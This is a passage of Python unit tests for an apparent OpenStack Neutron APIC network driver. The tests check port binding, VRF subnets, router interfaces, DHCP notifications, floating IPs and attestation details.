with self.port(subnet=sub, tenant_id='anothertenant') as p1:
p1 = p1['port']
self.assertEqual(net['id'], p1['network_id'])
self.mgr.ensure_path_created_for_port = mock.Mock()
# Bind port to trigger path binding
self._bind_port_to_host(p1['id'], 'h1')
# Called on the network's tenant
self.mgr.ensure_path_created_for_port.assert_called_once_with(
self._tenant(neutron_tenant='onetenant'),
net['id'], 'h1', mock.ANY, transaction=mock.ANY,
bd_name=None, app_profile_name=self._app_profile(
neutron_tenant='onetenant'))
def test_port_on_shared_opflex_network(self):
self.driver.apic_optimized_dhcp_lease_time = 100
self._register_agent('h1')
net = self.create_network(
tenant_id='onetenant', expected_res_status=201, shared=True,
is_admin_context=True)['network']
sub = self.create_subnet(
network_id=net['id'], cidr='192.168.0.0/24',
ip_version=4, is_admin_context=True)
with self.port(subnet=sub, tenant_id='anothertenant') as p1:
p1 = p1['port']
self.assertEqual(net['id'], p1['network_id'])
# Bind port to trigger path binding
self._bind_port_to_host(p1['id'], 'h1')
self.driver._add_ip_mapping_details = mock.Mock()
details = self._get_gbp_details(p1['id'], 'h1')
self.assertEqual(self._tenant(neutron_tenant='onetenant'),
details['ptg_tenant'])
self.assertEqual(self._app_profile(neutron_tenant='onetenant'),
details['app_profile_name'])
self.assertEqual('onetenant',
details['tenant_id'])
self.assertTrue(details['enable_dhcp_optimization'])
self.assertEqual(1, len(details['subnets']))
self.assertEqual(sub['subnet']['id'], details['subnets'][0]['id'])
# Verify Interface MTU correctly set
self.assertEqual(1000, details['interface_mtu'])
self.assertEqual(100, details['dhcp_lease_time'])
def test_port_security_port(self):
self._register_agent('h1')
net = self.create_network(
tenant_id='onetenant', expected_res_status=201, shared=True,
is_admin_context=True)['network']
self.create_subnet(
network_id=net['id'], cidr='192.168.0.0/24',
ip_version=4, is_admin_context=True)
self.driver._add_ip_mapping_details = mock.Mock()
# test compute port
p1 = self.create_port(
network_id=net['id'], tenant_id='onetenant',
device_owner='compute:', device_id='someid')['port']
self._bind_port_to_host(p1['id'], 'h1')
details = self._get_gbp_details(p1['id'], 'h1')
self.assertFalse(details['promiscuous_mode'])
p2 = self.create_port(
network_id=net['id'], tenant_id='onetenant',
device_owner='compute:', device_id='someid',
port_security_enabled=True)['port']
self._bind_port_to_host(p2['id'], 'h1')
details = self._get_gbp_details(p2['id'], 'h1')
self.assertFalse(details['promiscuous_mode'])
p3 = self.create_port(
network_id=net['id'], tenant_id='onetenant',
device_owner='compute:', device_id='someid',
port_security_enabled=False)['port']
self._bind_port_to_host(p3['id'], 'h1')
details = self._get_gbp_details(p3['id'], 'h1')
self.assertTrue(details['promiscuous_mode'])
# test DHCP port
p1_dhcp = self.create_port(
network_id=net['id'], tenant_id='onetenant',
device_owner=n_constants.DEVICE_OWNER_DHCP, device_id='someid')[
'port']
self._bind_port_to_host(p1_dhcp['id'], 'h1')
details = self._get_gbp_details(p1_dhcp['id'], 'h1')
self.assertTrue(details['promiscuous_mode'])
p2_dhcp = self.create_port(
network_id=net['id'], tenant_id='onetenant',
device_owner=n_constants.DEVICE_OWNER_DHCP, device_id='someid',
port_security_enabled=True)['port']
self._bind_port_to_host(p2_dhcp['id'], 'h1')
details = self._get_gbp_details(p2_dhcp['id'], 'h1')
self.assertTrue(details['promiscuous_mode'])
p3_dhcp = self.create_port(
network_id=net['id'], tenant_id='onetenant',
device_owner=n_constants.DEVICE_OWNER_DHCP, device_id='someid',
port_security_enabled=False)['port']
self._bind_port_to_host(p3_dhcp['id'], 'h1')
details = self._get_gbp_details(p3_dhcp['id'], 'h1')
self.assertTrue(details['promiscuous_mode'])
def test_enhanced_subnet_options(self):
self._register_agent('h1')
net = self.create_network(
tenant_id='onetenant', expected_res_status=201, shared=True,
is_admin_context=True)['network']
sub = self.create_subnet(
network_id=net['id'], cidr='192.168.0.0/24',
ip_version=4, is_admin_context=True)
with self.port(subnet=sub, tenant_id='onetenant') as p1:
with self.port(subnet=sub, device_owner='network:dhcp',
tenant_id='onetenant') as dhcp:
p1 = p1['port']
dhcp = dhcp['port']
self.assertEqual(net['id'], p1['network_id'])
# Bind port to trigger path binding
self._bind_port_to_host(p1['id'], 'h1')
self.driver._add_ip_mapping_details = mock.Mock()
self.driver.enable_metadata_opt = False
details = self._get_gbp_details(p1['id'], 'h1')
self.assertEqual(1, len(details['subnets']))
# Verify that DNS nameservers are correctly set
self.assertEqual([dhcp['fixed_ips'][0]['ip_address']],
details['subnets'][0]['dns_nameservers'])
# Verify Default route via GW
self.assertTrue({'destination': '0.0.0.0/0',
'nexthop': '192.168.0.1'} in
details['subnets'][0]['host_routes'])
# Verify Metadata route via DHCP
self.assertTrue(
{'destination': '169.254.169.254/16',
'nexthop': dhcp['fixed_ips'][0]['ip_address']} in
details['subnets'][0]['host_routes'])
# Verify no extra routes are leaking inside
self.assertEqual(2, len(details['subnets'][0]['host_routes']))
self.assertEqual([dhcp['fixed_ips'][0]['ip_address']],
details['subnets'][0]['dhcp_server_ips'])
def _test_vrf_details(self, vrf_per_router=False):
self._register_agent('h1')
net = self.create_network(
tenant_id=mocked.APIC_TENANT, is_admin_context=True)['network']
sub = self.create_subnet(
network_id=net['id'], cidr='192.168.0.0/24',
ip_version=4, is_admin_context=True)
self.create_subnet(
network_id=net['id'], cidr='192.168.2.0/24',
ip_version=4, is_admin_context=True)
net1 = self.create_network(
tenant_id=mocked.APIC_TENANT, is_admin_context=True)['network']
sub2 = self.create_subnet(
network_id=net1['id'], cidr='192.168.4.0/24',
ip_version=4, is_admin_context=True)
net2 = self.create_network(
tenant_id=mocked.APIC_TENANT, is_admin_context=True)['network']
sub3 = self.create_subnet(
network_id=net2['id'], cidr='192.168.6.0/24',
ip_version=4, is_admin_context=True)
self.create_subnet(
network_id=net2['id'], cidr='192.168.8.0/24',
ip_version=4, is_admin_context=True)
net_route_leak = self.create_network(
tenant_id=mocked.APIC_TENANT, is_admin_context=True,
**{'apic:allow_route_leak': 'True'})['network']
sub_route_leak = self.create_subnet(
network_id=net_route_leak['id'], cidr='192.168.96.0/24',
ip_version=4, is_admin_context=True)
net_route_leak1 = self.create_network(
tenant_id=mocked.APIC_TENANT, is_admin_context=True,
**{'apic:allow_route_leak': 'True'})['network']
sub_route_leak1 = self.create_subnet(
network_id=net_route_leak1['id'], cidr='192.168.98.0/24',
ip_version=4, is_admin_context=True)
router = self.create_router(api=self.ext_api,
tenant_id=mocked.APIC_TENANT)['router']
# use_routing_context router
router1 = self.create_router(api=self.ext_api,
tenant_id=mocked.APIC_TENANT,
**{'apic:use_routing_context':
router['id']}
)['router']
self.l3_plugin.add_router_interface(
context.get_admin_context(), router1['id'],
{'subnet_id': sub['subnet']['id']})
self.l3_plugin.add_router_interface(
context.get_admin_context(), router['id'],
{'subnet_id': sub3['subnet']['id']})
self.l3_plugin.add_router_interface(
context.get_admin_context(), router1['id'],
{'subnet_id': sub_route_leak['subnet']['id']})
self.l3_plugin.add_router_interface(
context.get_admin_context(), router['id'],
{'subnet_id': sub_route_leak1['subnet']['id']})
self.driver._add_ip_mapping_details = mock.Mock()
with self.port(subnet=sub_route_leak,
tenant_id=mocked.APIC_TENANT) as p0:
p0 = p0['port']
self._bind_port_to_host(p0['id'], 'h1')
details = self._get_gbp_details(p0['id'], 'h1')
if self.driver.per_tenant_context and vrf_per_router:
self.assertEqual(mocked.APIC_TENANT,
details['l3_policy_id'])
self.assertEqual(self._tenant(vrf=True),
details['vrf_tenant'])
self.assertEqual(self._network_vrf_name(),
details['vrf_name'])
self.assertEqual(['192.168.4.0/24', '192.168.96.0/24',
'192.168.98.0/24'],
details['vrf_subnets'])
else:
if self.driver.per_tenant_context:
self.assertEqual(mocked.APIC_TENANT,
details['l3_policy_id'])
else:
self.assertEqual('%s-shared' % self._tenant(vrf=True),
details['l3_policy_id'])
self.assertEqual(self._tenant(vrf=True),
details['vrf_tenant'])
self.assertEqual(self._network_vrf_name(),
details['vrf_name'])
self.assertEqual(['192.168.0.0/24', '192.168.2.0/24',
'192.168.4.0/24', '192.168.6.0/24',
'192.168.8.0/24', '192.168.96.0/24',
'192.168.98.0/24'],
details['vrf_subnets'])
with self.port(subnet=sub, tenant_id=mocked.APIC_TENANT) as p1:
p1 = p1['port']
self._bind_port_to_host(p1['id'], 'h1')
details = self._get_gbp_details(p1['id'], 'h1')
if self.driver.per_tenant_context and vrf_per_router:
self.assertEqual('router:%s' % router['id'],
details['l3_policy_id'])
self.assertEqual(self._tenant(vrf=True),
details['vrf_tenant'])
self.assertEqual(
self._routed_network_vrf_name(router=router['id']),
details['vrf_name'])
self.assertEqual(['192.168.0.0/24', '192.168.2.0/24',
'192.168.6.0/24', '192.168.8.0/24',
'192.168.96.0/24', '192.168.98.0/24'],
details['vrf_subnets'])
else:
if self.driver.per_tenant_context:
self.assertEqual(mocked.APIC_TENANT,
details['l3_policy_id'])
else:
self.assertEqual('%s-shared' % self._tenant(vrf=True),
details['l3_policy_id'])
self.assertEqual(self._tenant(vrf=True),
details['vrf_tenant'])
self.assertEqual(self._network_vrf_name(),
details['vrf_name'])
self.assertEqual(['192.168.0.0/24', '192.168.2.0/24',
'192.168.4.0/24', '192.168.6.0/24',
'192.168.8.0/24', '192.168.96.0/24',
'192.168.98.0/24'],
details['vrf_subnets'])
# remove the router interface
self.l3_plugin.remove_router_interface(
context.get_admin_context(), router['id'],
{'subnet_id': sub3['subnet']['id']})
details = self._get_gbp_details(p1['id'], 'h1')
if self.driver.per_tenant_context and vrf_per_router:
self.assertEqual(['192.168.0.0/24', '192.168.2.0/24',
'192.168.96.0/24', '192.168.98.0/24'],
details['vrf_subnets'])
else:
self.assertEqual(['192.168.0.0/24', '192.168.2.0/24',
'192.168.4.0/24', '192.168.6.0/24',
'192.168.8.0/24', '192.168.96.0/24',
'192.168.98.0/24'],
details['vrf_subnets'])
with self.port(subnet=sub2, tenant_id=mocked.APIC_TENANT) as p2:
p2 = p2['port']
self._bind_port_to_host(p2['id'], 'h1')
details = self._get_gbp_details(p2['id'], 'h1')
if self.driver.per_tenant_context:
self.assertEqual(mocked.APIC_TENANT,
details['l3_policy_id'])
else:
self.assertEqual('%s-shared' % self._tenant(vrf=True),
details['l3_policy_id'])
self.assertEqual(self._tenant(vrf=True),
details['vrf_tenant'])
self.assertEqual(self._network_vrf_name(),
details['vrf_name'])
if self.driver.per_tenant_context and vrf_per_router:
self.assertEqual(['192.168.4.0/24', '192.168.6.0/24',
'192.168.8.0/24', '192.168.96.0/24',
'192.168.98.0/24'],
details['vrf_subnets'])
else:
self.assertEqual(['192.168.0.0/24', '192.168.2.0/24',
'192.168.4.0/24', '192.168.6.0/24',
'192.168.8.0/24', '192.168.96.0/24',
'192.168.98.0/24'],
details['vrf_subnets'])
def test_vrf_details(self):
self._test_vrf_details()
def test_vrf_details_vrf_per_router(self):
self.driver.vrf_per_router_tenants.append(mocked.APIC_TENANT)
self._test_vrf_details(vrf_per_router=True)
def test_add_router_interface_on_shared_net_by_port(self):
net = self.create_network(
tenant_id='onetenant', expected_res_status=201, shared=True,
is_admin_context=True)['network']
sub = self.create_subnet(
network_id=net['id'], cidr='192.168.0.0/24',
ip_version=4, is_admin_context=True)
router = self.create_router(api=self.ext_api,
expected_res_status=201)['router']
with self.port(subnet=sub, tenant_id='anothertenant') as p1:
self.mgr.add_router_interface = mock.Mock()
self.l3_plugin.add_router_interface(
context.get_admin_context(), router['id'],
{'port_id': p1['port']['id']})
self.mgr.add_router_interface.assert_called_once_with(
self._tenant(neutron_tenant='onetenant'),
self._scoped_name(
router['id'], tenant=TEST_TENANT), net['id'],
app_profile_name=self._app_profile(neutron_tenant='onetenant'))
self.mgr.remove_router_interface = mock.Mock()
# Test removal
self.l3_plugin.remove_router_interface(
context.get_admin_context(), router['id'],
{'port_id': p1['port']['id']})
self.mgr.remove_router_interface.assert_called_once_with(
self._tenant(neutron_tenant='onetenant'),
self._scoped_name(router['id'], tenant=TEST_TENANT), net['id'],
app_profile_name=self._app_profile(neutron_tenant='onetenant'))
def test_add_router_interface_on_shared_net_by_subnet(self):
net = self.create_network(
tenant_id='onetenant', expected_res_status=201, shared=True,
is_admin_context=True)['network']
sub = self.create_subnet(
network_id=net['id'], cidr='192.168.0.0/24',
ip_version=4, is_admin_context=True,
tenant_id='anothertenant')['subnet']
router = self.create_router(api=self.ext_api,
expected_res_status=201)['router']
self.mgr.add_router_interface = mock.Mock()
self.l3_plugin.add_router_interface(
context.get_admin_context(), router['id'],
{'subnet_id': sub['id']})
self.mgr.add_router_interface.assert_called_once_with(
self._tenant(neutron_tenant='onetenant'),
self._scoped_name(router['id'], tenant=TEST_TENANT), net['id'],
app_profile_name=self._app_profile(neutron_tenant='onetenant'))
self.mgr.remove_router_interface = mock.Mock()
# Test removal
self.l3_plugin.remove_router_interface(
context.get_admin_context(), router['id'],
{'subnet_id': sub['id']})
self.mgr.remove_router_interface.assert_called_once_with(
self._tenant(neutron_tenant='onetenant'),
self._scoped_name(router['id'], tenant=TEST_TENANT), net['id'],
app_profile_name=self._app_profile(neutron_tenant='onetenant'))
def test_sync_on_demand(self):
self.synchronizer.reset_mock()
self.create_network(name=acst.APIC_SYNC_NETWORK, is_admin_context=True)
self.assertTrue(self.synchronizer._sync_base.called)
def test_sync_on_demand_no_admin(self):
self.synchronizer.reset_mock()
self.create_network(name=acst.APIC_SYNC_NETWORK)
self.assertFalse(self.synchronizer._sync_base.called)
def test_sync_on_demand_not(self):
self.synchronizer.reset_mock()
self.create_network(name='some_name', is_admin_context=True,
expected_res_status=201)
self.assertFalse(self.synchronizer._sync_base.called)
def test_attestation(self):
self._register_agent('h1')
net = self.create_network(
tenant_id='onetenant', expected_res_status=201)['network']
expected_attestation = {'ports': [{'switch': '102',
'port': 'eth4/23'}],
'policy-space-name': self._tenant(
neutron_tenant='onetenant'),
'endpoint-group-name': (
self._app_profile(
neutron_tenant='onetenant') + '|' +
net['id'])}
sub = self.create_subnet(
tenant_id='onetenant', network_id=net['id'], cidr='192.168.0.0/24',
ip_version=4)
self.driver.apic_manager.get_switch_and_port_for_host = mock.Mock(
return_value=[('102', 'eth4/23')])
with self.port(subnet=sub, tenant_id='onetenant') as p1:
p1 = p1['port']
self._bind_port_to_host(p1['id'], 'h1')
self.driver._add_ip_mapping_details = mock.Mock()
# Mock switch, module and port for host
details = self._get_gbp_details(p1['id'], 'h1')
# Test attestation exists
self.assertTrue('attestation' in details)
self.assertEqual(1, len(details['attestation']))
observed_attestation = base64.b64decode(
details['attestation'][0]['validator'])
# It's a json string
observed_attestation_copy = observed_attestation
# Unmarshal
observed_attestation = json.loads(observed_attestation)
del observed_attestation['timestamp']
del observed_attestation['validity']
self.assertEqual(expected_attestation, observed_attestation)
self.assertEqual(details['attestation'][0]['name'], p1['id'])
# Validate decrypting
observed_mac = base64.b64decode(
details['attestation'][0]['validator-mac'])
expected_mac = hmac.new(
'dirtylittlesecret', msg=observed_attestation_copy,
digestmod=hashlib.sha256).digest()
# Validation succeeded
self.assertEqual(expected_mac, observed_mac)
def test_dhcp_notifications_on_create(self):
self._register_agent('h1')
net = self.create_network(
expected_res_status=201, shared=True,
is_admin_context=True)['network']
sub = self.create_subnet(
network_id=net['id'], cidr='192.168.0.0/24',
ip_version=4, is_admin_context=True)
with self.port(subnet=sub) as p1:
self._bind_port_to_host(p1['port']['id'], 'h1')
with self.port(subnet=sub) as p2:
self._bind_port_to_host(p2['port']['id'], 'h1')
self.driver.notifier.reset_mock()
with self.port(subnet=sub, device_owner="network:dhcp"):
self.assertEqual(
2, self.driver.notifier.port_update.call_count)
p1 = self.show_port(p1['port']['id'],
is_admin_context=True)['port']
p2 = self.show_port(p2['port']['id'],
is_admin_context=True)['port']
expected_calls = [
mock.call(mock.ANY, p1),
mock.call(mock.ANY, p2)]
self._check_call_list(
expected_calls,
self.driver.notifier.port_update.call_args_list)
def test_dhcp_notifications_on_update(self):
self._register_agent('h1')
net = self.create_network(
expected_res_status=201, shared=True,
is_admin_context=True)['network']
sub = self.create_subnet(
network_id=net['id'], cidr='192.168.0.0/24',
ip_version=4, is_admin_context=True)
sub2 = self.create_subnet(
network_id=net['id'], cidr='192.168.1.0/24',
ip_version=4, is_admin_context=True)
with self.port(subnet=sub) as p1:
# Force port on a specific subnet
self.update_port(
p1['port']['id'],
fixed_ips=[{'subnet_id': sub['subnet']['id']}],
is_admin_context=True)
self._bind_port_to_host(p1['port']['id'], 'h1')
with self.port(subnet=sub2) as p2:
# Force port on a specific subnet
self.update_port(
p2['port']['id'],
fixed_ips=[{'subnet_id': sub2['subnet']['id']}],
is_admin_context=True)
self._bind_port_to_host(p2['port']['id'], 'h1')
self.driver.notifier.port_update.reset_mock()
with self.port(subnet=sub, device_owner="network:dhcp") as p3:
# Only sub 1 notifies
self.assertEqual(
1, self.driver.notifier.port_update.call_count)
# Force port on a specific subnet
self.update_port(
p3['port']['id'],
fixed_ips=[{'subnet_id': sub['subnet']['id']}],
is_admin_context=True)
self.driver.notifier.port_update.reset_mock()
# Switch DHCP port to sub2
self.update_port(
p3['port']['id'],
fixed_ips=[{'subnet_id': sub2['subnet']['id']}],
is_admin_context=True)
self.assertEqual(
2, self.driver.notifier.port_update.call_count)
p1 = self.show_port(p1['port']['id'],
is_admin_context=True)['port']
p2 = self.show_port(p2['port']['id'],
is_admin_context=True)['port']
expected_calls = [
mock.call(mock.ANY, p1),
mock.call(mock.ANY, p2)]
self._check_call_list(
expected_calls,
self.driver.notifier.port_update.call_args_list)
def test_overlapping_ip_ownership(self):
ha_handler = ha.HAIPOwnerDbMixin()
net1 = self.create_network(
tenant_id='onetenant', expected_res_status=201, shared=True,
is_admin_context=True)['network']
sub1 = self.create_subnet(
network_id=net1['id'], cidr='192.168.0.0/24',
ip_version=4, is_admin_context=True)
# Create another network with the same subnet
net2 = self.create_network(
tenant_id='onetenant', expected_res_status=201, shared=True,
is_admin_context=True)['network']
sub2 = self.create_subnet(
network_id=net2['id'], cidr='192.168.0.0/24',
ip_version=4, is_admin_context=True)
# Create 2 ports in each subnet, with the same IP address
with self.port(subnet=sub1, fixed_ips=[{'ip_address':
'192.168.0.4'}]) as p1:
with self.port(subnet=sub2, fixed_ips=[{'ip_address':
'192.168.0.4'}]) as p2:
p1 = p1['port']
p2 = p2['port']
# Verify the two IPs are the same
self.assertEqual([x['ip_address'] for x in p1['fixed_ips']],
[x['ip_address'] for x in p2['fixed_ips']])
# Set P1 as owner
ha_handler.update_ip_owner(
{'port': p1['id'], 'ip_address_v4': '192.168.0.4'})
# Ownership is set in the DB for P1
own_p1 = ha_handler.ha_ip_handler.get_ha_ipaddresses_for_port(
p1['id'])
self.assertEqual(['192.168.0.4'], own_p1)
# Set P2 as owner
ha_handler.update_ip_owner(
{'port': p2['id'], 'ip_address_v4': '192.168.0.4'})
# Ownership is set in the DB for P2
own_p2 = ha_handler.ha_ip_handler.get_ha_ipaddresses_for_port(
p2['id'])
self.assertEqual(['192.168.0.4'], own_p2)
# P1 is still there
own_p1 = ha_handler.ha_ip_handler.get_ha_ipaddresses_for_port(
p1['id'])
self.assertEqual(['192.168.0.4'], own_p1)
# Verify number of entries is exactly 2
session = db_api.get_session()
entries = session.query(
ha.HAIPAddressToPortAssocation).all()
self.assertEqual(2, len(entries))
def test_ip_address_owner_update(self):
net = self.create_network(
tenant_id=mocked.APIC_TENANT, expected_res_status=201)['network']
self.create_subnet(
tenant_id=mocked.APIC_TENANT,
network_id=net['id'], cidr='10.0.0.0/24', ip_version=4)['subnet']
p1 = self.create_port(
network_id=net['id'], tenant_id=mocked.APIC_TENANT,
device_owner='compute:', device_id='someid')['port']
p2 = self.create_port(
network_id=net['id'], tenant_id=mocked.APIC_TENANT,
device_owner='compute:', device_id='someid')['port']
ip_owner_info = {'port': p1['id'], 'ip_address_v4': '1.2.3.4'}
self.driver.notify_port_update = mock.Mock()
# set new owner
self.driver.ip_address_owner_update(
context.get_admin_context(),
ip_owner_info=ip_owner_info, host='h1')
obj = self.driver.ha_ip_handler.get_port_for_ha_ipaddress(
'1.2.3.4', net['id'])
self.assertEqual(p1['id'], obj['port_id'])
self.driver.notify_port_update.assert_called_with(p1['id'])
# update existing owner
self.driver.notify_port_update.reset_mock()
ip_owner_info['port'] = p2['id']
self.driver.ip_address_owner_update(
context.get_admin_context(),
ip_owner_info=ip_owner_info, host='h2')
obj = self.driver.ha_ip_handler.get_port_for_ha_ipaddress(
'1.2.3.4', net['id'])
self.assertEqual(p2['id'], obj['port_id'])
exp_calls = [
mock.call(p1['id']),
mock.call(p2['id'])]
self._check_call_list(
exp_calls, self.driver.notify_port_update.call_args_list)
def test_gbp_details_for_allowed_address_pair(self):
self._register_agent('h1')
self._register_agent('h2')
net = self.create_network(
tenant_id=mocked.APIC_TENANT, expected_res_status=201)['network']
sub1 = self.create_subnet(
tenant_id=mocked.APIC_TENANT,
network_id=net['id'], cidr='10.0.0.0/24', ip_version=4)['subnet']
sub2 = self.create_subnet(
tenant_id=mocked.APIC_TENANT,
network_id=net['id'], cidr='1.2.3.0/24', ip_version=4)['subnet']
allow_addr = [{'ip_address': '1.2.3.250',
'mac_address': '00:00:00:AA:AA:AA'},
{'ip_address': '1.2.3.251',
'mac_address': '00:00:00:BB:BB:BB'}]
# create 2 ports with same allowed-addresses
p1 = self.create_port(
network_id=net['id'], tenant_id=mocked.APIC_TENANT,
device_owner='compute:', device_id='someid',
fixed_ips=[{'subnet_id': sub1['id']}],
allowed_address_pairs=allow_addr)['port']
p2 = self.create_port(
network_id=net['id'], tenant_id=mocked.APIC_TENANT,
device_owner='compute:', device_id='someid',
fixed_ips=[{'subnet_id': sub1['id']}],
allowed_address_pairs=allow_addr)['port']
self._bind_port_to_host(p1['id'], 'h1')
self._bind_port_to_host(p2['id'], 'h2')
self.driver.ha_ip_handler.set_port_id_for_ha_ipaddress(
p1['id'], '1.2.3.250')
self.driver.ha_ip_handler.set_port_id_for_ha_ipaddress(
p2['id'], '1.2.3.251')
allow_addr[0]['active'] = True
details = self._get_gbp_details(p1['id'], 'h1')
self.assertEqual(allow_addr, details['allowed_address_pairs'])
del allow_addr[0]['active']
allow_addr[1]['active'] = True
details = self._get_gbp_details(p2['id'], 'h2')
self.assertEqual(allow_addr, details['allowed_address_pairs'])
# set allowed-address as fixed-IP of ports p3 and p4, which also have
# floating-IPs. Verify that FIP is "stolen" by p1 and p2
net_ext = self.create_network(
is_admin_context=True, tenant_id=mocked.APIC_TENANT,
**{'router:external': 'True'})['network']
self.create_subnet(
is_admin_context=True, tenant_id=mocked.APIC_TENANT,
network_id=net_ext['id'], cidr='8.8.8.0/24',
ip_version=4)['subnet']
p3 = self.create_port(
network_id=net['id'], tenant_id=mocked.APIC_TENANT,
fixed_ips=[{'subnet_id': sub2['id'],
'ip_address': '1.2.3.250'}])['port']
p4 = self.create_port(
network_id=net['id'], tenant_id=mocked.APIC_TENANT,
fixed_ips=[{'subnet_id': sub2['id'],
'ip_address': '1.2.3.251'}])['port']
rtr = self.create_router(
api=self.ext_api, tenant_id=mocked.APIC_TENANT,
external_gateway_info={'network_id': net_ext['id']})['router']
self.l3_plugin.add_router_interface(
context.get_admin_context(), rtr['id'], {'subnet_id': sub2['id']})
fip1 = self.create_floatingip(
tenant_id=mocked.APIC_TENANT, port_id=p3['id'],
floating_network_id=net_ext['id'],
api=self.ext_api)['floatingip']
fip2 = self.create_floatingip(
tenant_id=mocked.APIC_TENANT, port_id=p4['id'],
floating_network_id=net_ext['id'],
api=self.ext_api)['floatingip']
details = self._get_gbp_details(p1['id'], 'h1')
self.assertEqual(1, len(details['floating_ip']))
self.assertEqual(
fip1['floating_ip_address'],
details['floating_ip'][0]['floating_ip_address'])
details = self._get_gbp_details(p2['id'], 'h2')
self.assertEqual(1, len(details['floating_ip']))
self.assertEqual(
fip2['floating_ip_address'],
details['floating_ip'][0]['floating_ip_address'])
# verify FIP updates: update to p3, p4 should also update p1 and p2
self.driver.notify_port_update = mock.Mock()
self.driver.notify_port_update_for_fip(p3['id'])
expected_calls = [
mock.call(p, mock.ANY)
for p in sorted([p1['id'], p2['id'], p3['id']])]
self._check_call_list(
expected_calls, self.driver.notify_port_update.call_args_list)
self.driver.notify_port_update.reset_mock()
self.driver.notify_port_update_for_fip(p4['id'])
expected_calls = [
mock.call(p, mock.ANY)
for p in sorted([p1['id'], p2['id'], p4['id']])]
self._check_call_list(
expected_calls, self.driver.notify_port_update.call_args_list)
def test_gbp_details_for_route_leak_network(self):
self.driver.per_tenant_context = True
self.driver.vrf_per_router_tenants.append(mocked.APIC_TENANT)
self._register_agent('h1')
net_route_leak = self.create_network(
tenant_id=mocked.APIC_TENANT, expected_res_status=201,
**{'apic:allow_route_leak': 'True'})['network']
sub_route_leak = self.create_subnet(
tenant_id=mocked.APIC_TENANT,
network_id=net_route_leak['id'], cidr='10.0.0.0/24',
ip_version=4)['subnet']
rtr1 = self.create_router(
api=self.ext_api, tenant_id=mocked.APIC_TENANT)['router']
self.l3_plugin.add_router_interface(
context.get_admin_context(), rtr1['id'],
{'subnet_id': sub_route_leak['id']})
p1 = self.create_port(
network_id=net_route_leak['id'], tenant_id=mocked.APIC_TENANT,
device_owner='compute:', device_id='someid',
fixed_ips=[{'subnet_id': sub_route_leak['id'],
'ip_address': '10.0.0.10'}])['port']
self._bind_port_to_host(p1['id'], 'h1')
rtr2 = self.create_router(
api=self.ext_api, tenant_id=mocked.APIC_TENANT)['router']
p2 = self.create_port(
network_id=net_route_leak['id'], tenant_id=mocked.APIC_TENANT,
device_owner='network:router_interface',
fixed_ips=[{'subnet_id': sub_route_leak['id'],
'ip_address': '10.0.0.2'}])['port']
self.l3_plugin.add_router_interface(
context.get_admin_context(), rtr2['id'],
{'port_id': p2['id']})
# use_routing_context router
rtr3 = self.create_router(
api=self.ext_api, tenant_id=mocked.APIC_TENANT,
**{'apic:use_routing_context': rtr1['id']})['router']
p3 = self.create_port(
network_id=net_route_leak['id'], tenant_id=mocked.APIC_TENANT,
device_owner='network:router_interface',
fixed_ips=[{'subnet_id': sub_route_leak['id'],
'ip_address': '10.0.0.3'}])['port']
self.l3_plugin.add_router_interface(
context.get_admin_context(), rtr3['id'],
{'port_id': p3['id']})
details = self._get_gbp_details(p1['id'], 'h1')
self.assertEqual(2, len(details['floating_ip']))
self.assertEqual('10.0.0.10',
details['floating_ip'][0]['fixed_ip_address'])
self.assertEqual('10.0.0.10',
details['floating_ip'][0]['floating_ip_address'])
self.assertEqual(self._tenant(),
details['floating_ip'][0]['nat_epg_tenant'])
self.assertEqual(self._app_profile(),
details['floating_ip'][0]['nat_epg_app_profile'])
leak_epg_name = 'Leak-%s-%s' % (rtr1['id'],
net_route_leak['id'])
self.assertEqual(leak_epg_name,
details['floating_ip'][0]['nat_epg_name'])
self.assertEqual('10.0.0.10',
details['floating_ip'][1]['fixed_ip_address'])
self.assertEqual('10.0.0.10',
details['floating_ip'][1]['floating_ip_address'])
self.assertEqual(self._tenant(),
details['floating_ip'][1]['nat_epg_tenant'])
self.assertEqual(self._app_profile(),
details['floating_ip'][1]['nat_epg_app_profile'])
leak_epg_name = 'Leak-%s-%s' % (rtr2['id'],
net_route_leak['id'])
self.assertEqual(leak_epg_name,
details['floating_ip'][1]['nat_epg_name'])
def test_notify_router_interface_update(self):
exc = driver.InterTenantRouterInterfaceNotAllowedOnPerTenantContext
net = self.create_network(
tenant_id='onetenant', expected_res_status=201, shared=True,
is_admin_context=True)['network']
sub = self.create_subnet(
network_id=net['id'], cidr='192.168.0.0/24',
ip_version=4, is_admin_context=True)
router = self.create_router(api=self.ext_api,
expected_res_status=201)['router']
self._register_agent('h1')
with self.port(subnet=sub, tenant_id='anothertenant',
device_owner='network:router_interface') as p1:
with self.port(subnet=sub, tenant_id='anothertenant') as p2:
self._bind_port_to_host(p2['port']['id'], 'h1')
self.mgr.add_router_interface = mock.Mock()
if self.driver.per_tenant_context:
self.assertRaises(
exc,
self.l3_plugin.add_router_interface,
context.get_admin_context(),
router['id'], {'port_id': p1['port']['id']}
)
else:
self.l3_plugin.add_router_interface(
context.get_admin_context(), router['id'],
{'port_id': p1['port']['id']})
self.assertEqual(n_constants.DEVICE_OWNER_ROUTER_INTF,
p1['port']['device_owner'])
self.driver.notifier.port_update = mock.Mock()
self.driver._notify_ports_due_to_router_update(p1['port'])
self.assertEqual(
1, self.driver.notifier.port_update.call_count)
self.assertEqual(
p2['port']['id'],
self.driver.notifier.port_update.call_args_list[
0][0][1]['id'])
def test_create_reserved_name(self):
net = self.create_network(
tenant_id='onetenant', name=acst.APIC_SYNC_NETWORK,
expected_res_status=201)
self.assertEqual({}, net['network'])
# Net shouldn't exist
nets = self.driver.db_plugin.get_networks(
context.get_admin_context(),
filters={'name': [acst.APIC_SYNC_NETWORK]})
self.assertEqual(0, len(nets))
def test_request_endpoint_details(self):
net = self.create_network(expected_res_status=201)['network']
sub = self.create_subnet(
network_id=net['id'], cidr='192.168.0.0/24',
ip_version=4)
self._register_agent('h1')
with self.port(subnet=sub) as p1:
p1 = p1['port']
self.assertEqual(net['id'], p1['network_id'])
# Bind port to trigger path binding
self._bind_port_to_host(p1['id'], 'h1')
self.driver._add_ip_mapping_details = mock.Mock()
details = self._get_gbp_details(p1['id'], 'h1')
request = self._request_endpoint_details(p1['id'], 'h1')
details.pop('attestation', None)
request['gbp_details'].pop('attestation', None)
self.assertEqual(details, request['gbp_details'])
self.assertEqual(p1['id'], request['neutron_details']['port_id'])
def test_request_endpoint_details_not_found(self):
self.driver._add_ip_mapping_details = mock.Mock()
request = self._request_endpoint_details('randomid', 'h1')
# Port not found
self.assertEqual({'device': 'tap%s' % 'randomid'},
request['gbp_details'])
self.assertTrue('port_id' not in request['neutron_details'])
def test_request_endpoint_details_exception(self):
